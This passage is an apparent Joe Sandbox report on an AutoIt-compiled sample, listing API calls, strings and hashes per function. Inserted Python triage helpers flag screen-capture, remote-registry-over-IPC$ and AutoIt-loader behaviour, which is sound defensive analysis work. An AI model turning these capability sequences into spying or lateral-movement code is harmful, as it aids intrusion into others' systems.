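• DeleteObject.GDI32(00000000), ref: 0084BB5E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0084BB74
Memory Dump Source
APIs
• GetLocalTime.KERNEL32(?), ref: 0082DCDC
• SystemTimeToFileTime.KERNEL32(?,?), ref: 0082DCEC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0082DCF8
• __wsplitpath.LIBCMT ref: 0082DD56
• _wcscat.LIBCMT ref: 0082DD6E
• _wcscat.LIBCMT ref: 0082DD80
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0082DD95
• SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDA9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDDB
• SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDFC
• _wcscpy.LIBCMT ref: 0082DE08
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0082DE47
Strings
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", optional comma, then "ref: <8 hex digits>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Words the report's API IDs visibly drop (assumption fitted to this page).
STOPWORDS = {"Get", "Set", "Def", "Dlg", "Sys", "Box", "To", "Ex", "ID", "On", "Ole"}
# CamelCase words, or a CRT-style name such as "_wcscat" / "__wcsicmp_l" kept whole.
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|_+[a-z0-9_]+")


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int           # address of the call site
    subcall: str = ""  # callee address when listed as "Part of subcall function"


def parse_api_listings(text):
    """Return one list of ApiCall per "APIs" block; any other non-blank line ends a block."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            current.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] or ""))
        elif line.strip():
            current = None
    return functions


def tokens(api):
    """Words of an API name that contribute to the key; single letters (W, A, H) are dropped."""
    return [t for t in TOKEN_RE.findall(api) if len(t) > 1 and t not in STOPWORDS]


def api_id(calls):
    """Words grouped by descending count, sorted within a group, groups joined with "$"."""
    counts = Counter(t for c in calls for t in tokens(c.api))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def calls_matching(functions, pattern):
    """Pivot helper: (function index, call) for every call whose API name matches pattern."""
    rx = re.compile(pattern)
    return [(i, c) for i, fn in enumerate(functions) for c in fn if rx.search(c.api)]


if __name__ == "__main__":
    for fn in parse_api_listings(SAMPLE):
        print(f"{fn[0].ref:08X}  {api_id(fn)}")
```

Running the block prints one line per listing whose key matches the API ID the report shows for that function, which is the check that the reconstruction holds for these two routines. The `calls_matching` helper is the practical use: feed it the whole report text and a pattern such as `CurrentDirectory` or `SetFileAttributes` to get every call-site address to pivot on in the disassembly, instead of reading the fuzzy-hash blocks one by one.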
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0082DA10
                                                        • _wcscat.LIBCMT ref: 0082DA28
                                                        • _wcscat.LIBCMT ref: 0082DA3A
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0082DA4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DA63
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0082DA7B
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0082DA95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: 5c2668a2e3c4338d4ee9f4c6809ae907c1b31e0ed95e00f1a21c6a2b37973419
                                                        • Instruction ID: a9a97ef44d2174a6b99ed752d2932ce2dd67f799065636525d1ef8e61472e899
                                                        • Opcode Fuzzy Hash: 5c2668a2e3c4338d4ee9f4c6809ae907c1b31e0ed95e00f1a21c6a2b37973419
                                                        • Instruction Fuzzy Hash: 8E81BF715083649FCB20DF64D844AAABFE8FF89314F14882EF889CB251E634D9C5CB52
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00846FA5
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00846FA8
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00846FCC
                                                        • _memset.LIBCMT ref: 00846FDD
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00846FEF
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00847067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID: 0R
                                                        • API String ID: 830647256-1916035689
                                                        • Opcode ID: 42bb75bf0b02fa32bdd742dd3afb24961358ec607c63651fb2467257ff13fccd
                                                        • Instruction ID: 1c2770b9e149479f13e169ddb369cc5fe5f8d080b29183e500c43963fe50b58c
                                                        • Opcode Fuzzy Hash: 42bb75bf0b02fa32bdd742dd3afb24961358ec607c63651fb2467257ff13fccd
                                                        • Instruction Fuzzy Hash: 23615A75900248AFDB11DFA8CC81EEE77B8FB09710F10416AFA14EB2A1D775AD45DB90
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0083738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0083739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 008373A7
                                                        • SelectObject.GDI32(00000000,?), ref: 008373B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00837408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00837444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00837468
                                                        • SelectObject.GDI32(00000006,?), ref: 00837470
                                                        • DeleteObject.GDI32(?), ref: 00837479
                                                        • DeleteDC.GDI32(00000006), ref: 00837480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0083748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: add2ddd24a3c13dc0f104c7ac653ad540150626ab38ba1421240faae9cbbbce1
                                                        • Instruction ID: 0a3b405d2e27b1605908ac9c9bb710d4abf5bc406729c89f4c1ba3182121a275
                                                        • Opcode Fuzzy Hash: add2ddd24a3c13dc0f104c7ac653ad540150626ab38ba1421240faae9cbbbce1
                                                        • Instruction Fuzzy Hash: 35513CB5904209EFCB24CFA8CC85AAEBBB9FF89310F14842DF95997211C775A940CB90
                                                        APIs
                                                          • Part of subcall function 007E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007C6B0C,?,00008000), ref: 007E0973
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007C6BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C6CFA
                                                          • Part of subcall function 007C586D: _wcscpy.LIBCMT ref: 007C58A5
                                                          • Part of subcall function 007E363D: _iswctype.LIBCMT ref: 007E3645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: 55fa664f6448210c4e6b94723b00ffa5a48201cf15c02996792e81ffdf9068b4
                                                        • Instruction ID: 83594580fa1cf43a4b224318f7510c2ed97fe555d86737c6447ae5ef0a7b7372
                                                        • Opcode Fuzzy Hash: 55fa664f6448210c4e6b94723b00ffa5a48201cf15c02996792e81ffdf9068b4
                                                        • Instruction Fuzzy Hash: 46026A30108345DFC724EF24C885AAEBBE5FF98314F10491DF596972A2DA39E989CB52
                                                        APIs
                                                        • _memset.LIBCMT ref: 00822D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00822DDD
                                                        • GetMenuItemCount.USER32(00885890), ref: 00822E66
                                                        • DeleteMenu.USER32(00885890,00000005,00000000,000000F5,?,?), ref: 00822EF6
                                                        • DeleteMenu.USER32(00885890,00000004,00000000), ref: 00822EFE
                                                        • DeleteMenu.USER32(00885890,00000006,00000000), ref: 00822F06
                                                        • DeleteMenu.USER32(00885890,00000003,00000000), ref: 00822F0E
                                                        • GetMenuItemCount.USER32(00885890), ref: 00822F16
                                                        • SetMenuItemInfoW.USER32(00885890,00000004,00000000,00000030), ref: 00822F4C
                                                        • GetCursorPos.USER32(?), ref: 00822F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00822F5F
                                                        • TrackPopupMenuEx.USER32(00885890,00000000,?,00000000,00000000,00000000), ref: 00822F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00822F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: d423b550202695696b7019ea7380935f3d14581ad7ca1ebaa9b022c62bf42b88
                                                        • Instruction ID: b1203c5701146eb6c7bf19a06aa99134b8852e0a9a43633a2b48541699388ae2
                                                        • Opcode Fuzzy Hash: d423b550202695696b7019ea7380935f3d14581ad7ca1ebaa9b022c62bf42b88
                                                        • Instruction Fuzzy Hash: 7E71E774600229BFEB218F58EC45FAABF64FF05364F14421AF625E61E2CBB15CA0D791
                                                        APIs
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • _memset.LIBCMT ref: 0081786B
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008178A0
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008178BC
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008178D8
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00817902
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0081792A
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00817935
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0081793A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: fc36c3bc300c20314e03b17b8c8bb656bfacb3ce0183dfd053c9ab792bcd32fa
                                                        • Instruction ID: fe0add8e014dccb940229317989e78044a1b6676e1220adfc93725fba002bb89
                                                        • Opcode Fuzzy Hash: fc36c3bc300c20314e03b17b8c8bb656bfacb3ce0183dfd053c9ab792bcd32fa
                                                        • Instruction Fuzzy Hash: 8B412872C14229EACB25EBA4DC49EEDB778FF04310F00406DE905A3161DB359D44CF90
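The three function blocks above are the ones a reverser pattern-matches on sight: the GDI sequence at 0083738F (GetDC, CreateCompatibleBitmap, StretchBlt, GetDIBits) is a screen capture, the strings at 007C6BAD (AU3!, EA06, >>>AUTOIT SCRIPT<<<) are the AutoIt compiled-script loader, and WNetAddConnection2W followed by RegConnectRegistryW at 008178A0 is a remote registry open over the IPC$ share. The following Python is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses function blocks in this page's format and flags those three behaviours. The rule table, the behaviour labels and the sample blocks (constructed by copying lines from this page) are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox IDA-plugin function blocks (added example).

Parses the "APIs" and "String ID" lines of one function block into a record
and flags API sets that a reverser recognises on sight. RULES and
AUTOIT_MARKERS are assumptions of this example, not the sandbox's own logic.
"""
import re
from dataclasses import dataclass, field

# Matches "• GetDIBits.GDI32(00000006,?,...), ref: 00837444", "• _memset.LIBCMT ref: 0082DA10"
# and the indented "• Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06" form.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
STRING_LINE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<strings>.*)$")

# Assumed rule table: every API in the set must appear in the block.
RULES = {
    "screen capture (GDI)": {"GetDC", "CreateCompatibleBitmap", "StretchBlt", "GetDIBits"},
    "remote registry over IPC$": {"WNetAddConnection2W", "RegConnectRegistryW"},
}
# Strings the AutoIt script loader references (taken from the block at 007C6BAD).
AUTOIT_MARKERS = ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, ref) per API line
    strings: list = field(default_factory=list)  # values of the String ID field


def parse_block(text: str) -> FunctionBlock:
    """Parse one function block. The report joins strings with '$', so a string
    that itself ends in '$' (the IPC$ share name) loses that character: it shows
    up here as '\\IPC'. Treat a trailing '$' as ambiguous when writing rules."""
    fb = FunctionBlock()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            fb.apis.append((m["name"], m["module"], m["ref"]))
            continue
        m = STRING_LINE.match(line)
        if m and m["strings"].strip():
            fb.strings.extend(s for s in m["strings"].split("$") if s)
    return fb


def classify(fb: FunctionBlock) -> list:
    """Return the behaviour labels whose API set or marker strings are present."""
    names = {name for name, _, _ in fb.apis}
    hits = [label for label, required in RULES.items() if required <= names]
    if any(marker in fb.strings for marker in AUTOIT_MARKERS):
        hits.append("AutoIt compiled-script loader strings")
    return hits


# Constructed samples: lines copied from the function blocks on this page.
SCREENSHOT_BLOCK = """\
• GetDC.USER32(00000000), ref: 0083738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0083739B
• CreateCompatibleDC.GDI32(?), ref: 008373A7
• SelectObject.GDI32(00000000,?), ref: 008373B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00837408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00837444
• ReleaseDC.USER32(00000000,?), ref: 0083748B
• String ID: (
"""

REMOTE_REGISTRY_BLOCK = r"""
• Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
• _memset.LIBCMT ref: 0081786B
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008178A0
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008178BC
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008178D8
• String ID: SOFTWARE\Classes\$\CLSID$\IPC$
"""

AUTOIT_BLOCK = """\
• Part of subcall function 007E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007C6B0C,?,00008000), ref: 007E0973
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007C6BAD
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
"""

if __name__ == "__main__":
    for label, block in (("0083738F", SCREENSHOT_BLOCK),
                         ("008178A0", REMOTE_REGISTRY_BLOCK),
                         ("007C6BAD", AUTOIT_BLOCK)):
        print(label, classify(parse_block(block)))
```

The rule for the remote-registry case keys on the API pair rather than on the `\IPC` string precisely because the report's `$` separator swallows the share name's own dollar sign; any rule written against the String ID field has to allow for that.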
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0083FDAD,?,?), ref: 00840E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: ae2adfa92256419305e7193616b88b7e9fc84734f77ecdeef14b88a3cc347593
                                                        • Instruction ID: d8b5c1498859b0faa10212dc0fb369734c4eee380311f5ef0d1dc454588b7a64
                                                        • Opcode Fuzzy Hash: ae2adfa92256419305e7193616b88b7e9fc84734f77ecdeef14b88a3cc347593
                                                        • Instruction Fuzzy Hash: 0241273210024ECBCF10EF50D859AEF3764FF15304F548468FE959B296DB78A99ACBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084716A
                                                        • CreateMenu.USER32 ref: 00847185
                                                        • SetMenu.USER32(?,00000000), ref: 00847194
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00847221
                                                        • IsMenu.USER32(?), ref: 00847237
                                                        • CreatePopupMenu.USER32 ref: 00847241
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0084726E
                                                        • DrawMenuBar.USER32 ref: 00847276
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$0R$F
                                                        • API String ID: 176399719-275108604
                                                        • Opcode ID: 9371a3d47bfcf16db7f4b4f5adc67aeab8630b566f388e47372eb329c94b4bda
                                                        • Instruction ID: 2f83ee04dfd248d06bef2a1d37b14754d8d39348e7ca0b84c46452f2d986ed5e
                                                        • Opcode Fuzzy Hash: 9371a3d47bfcf16db7f4b4f5adc67aeab8630b566f388e47372eb329c94b4bda
                                                        • Instruction Fuzzy Hash: F7416778A01219EFEB20DFA4D884E9A7BB5FF09310F154529FA06E7361D771A910CB90
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007FE2A0,00000010,?,Bad directive syntax error,0084F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0081F7C2
                                                        • LoadStringW.USER32(00000000,?,007FE2A0,00000010), ref: 0081F7C9
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • _wprintf.LIBCMT ref: 0081F7FC
                                                        • __swprintf.LIBCMT ref: 0081F81E
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0081F88D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1506413516-4153970271
                                                        • Opcode ID: da9c2e061550522caa92c7a6cc40dd5e99fe149b52650a72cff783f7a56537e6
                                                        • Instruction ID: bd5f11cbf69e388c856d10d1a8b89b60ae8d11cdc816012fea80b6ce0e9155d5
                                                        • Opcode Fuzzy Hash: da9c2e061550522caa92c7a6cc40dd5e99fe149b52650a72cff783f7a56537e6
                                                        • Instruction Fuzzy Hash: 9221613194021EEBCF15EF90CC0EFED7739FF28310F044469B519A61A2EA75A654DB60
                                                        APIs
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                          • Part of subcall function 007C7924: _memmove.LIBCMT ref: 007C79AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00825330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00825346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00825357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00825369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0082537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: dbe695a2a6f25f8e12ed9cd19ea2fab300774f7a73ba8b8d9b34b30102380085
                                                        • Instruction ID: f7cdc623cc0f7ddf00a5d4dbe07d40632f117a9595002db66a4065dbf8a05670
                                                        • Opcode Fuzzy Hash: dbe695a2a6f25f8e12ed9cd19ea2fab300774f7a73ba8b8d9b34b30102380085
                                                        • Instruction Fuzzy Hash: 9411B120A90169B9D724B661DC4EEFF6BBCFBA2B84F00041DB415E21D1DDB45C44C960
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
